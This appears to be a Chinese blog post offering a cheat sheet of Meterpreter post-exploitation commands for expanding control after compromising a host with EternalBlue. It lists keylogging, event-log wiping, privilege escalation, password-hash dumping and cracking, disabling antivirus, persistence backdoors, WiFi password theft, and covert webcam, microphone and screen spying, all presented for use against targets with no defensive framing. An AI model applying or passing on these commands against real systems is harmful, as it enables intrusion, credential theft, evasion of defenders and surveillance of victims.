后渗透攻击命令和模块

通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块

一、命令

1、arp

查看内网主机

2、background

将当前的会话转在后台运行。从而进行新的渗透测试。

如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令

3、clearev

清除系统,软件之类的所有登陆信息

4、download、upload

download可以下载目标系统的文件

upload可以上传本机文件到目标系统

目标机成功上传

5、edit

编辑命令,运行的是vim编辑器

查看目标机,成功写入

6、execute

执行命令,可执行脚本或程序

7、getprivs

查看当前用户具备的权限

8、getuid

查看 meterpreter 所在的用户组,或者说是你目前所拥有的权限

getsystem

提权为管理员

9、sysinfo

查看计算机系统和名称等详细信息

10、idletime

查看目标系统运行了多长时间

11、keyscan_start 开启键盘记录

keyscan_dump 键盘记录下载

keyscan_stop 停止键盘记录

12、load

加载一些带有其他功能(后门)的软件

13、lpwd与lcd

Lpwd:

显示本地目录,也就是你自己所在的自己系统的位置。

Lcd:

进入本地目录。也就是进入你自己系统的目录

14、ps

查看目标系统的所有进程。

如果没有root权限或者administrator权限,可以先查看进程,随后根据进程分析目标系统运行了什么软件。可以查找哪些软件有命令执行漏洞用来提权。甚至你还可以查看到目标系统用什么数据库之类的等等。

15、screenshot

截取目标系统屏幕

16、search

搜索目标系统的文件

17、shell

在目标系统打开一个命令行窗口,相当于cmd

出现乱码可以输入 chcp 65001

18、web_list 查看目标机器上是否有网络摄像头,并且列举出来

webcam_snap 连接目标系统的摄像头

二、模块

1、hashdump 获取目标系统哈希值

run post/windows/gather/hashdump

把获取到的哈希值在彩虹表中进行破解,访问md5在线解密破解,md5解密加密

2、migrate

run post/windows/manage/migrate

可以将meterpreter当前的进程移动到一个新的进程。

主要用来防软杀,或者进程不稳定的时候使用这个模块。

成功由2364进程迁移到2272进程

3、run killav 关闭对方杀软

run /post/windows/manage/killav

4、run post/windows/gather/enum_computers

枚举 Windows 域内所有用户,不包含目标主机

5、run persistence

写入硬盘,下次目标主机启动时,木马将会自启动(不一定成功,建议重新上传后门)

6、run post/multi/gather/wlan_geolocate

基于WLAN进行地理位置确认。

Ø/root/.msf4/loot ,如果通过该模块获得了地理信息,会在该文件夹下生 成TXT文件

7、run hashdump

获取目标系统哈希值,包括密码提示,需要有”system“权限

8、run service_manager

目标主机系统服务管理

9、run post/windows/wlan/wlan_profile

获取目标主机WiFi密码

10、run vnc

屏幕实时监控

配合run sound_recoder(录制声音) ,run webcam(开启摄像头),效果更佳

  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cwillchris

你的鼓励将让我产出更多优质干货

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值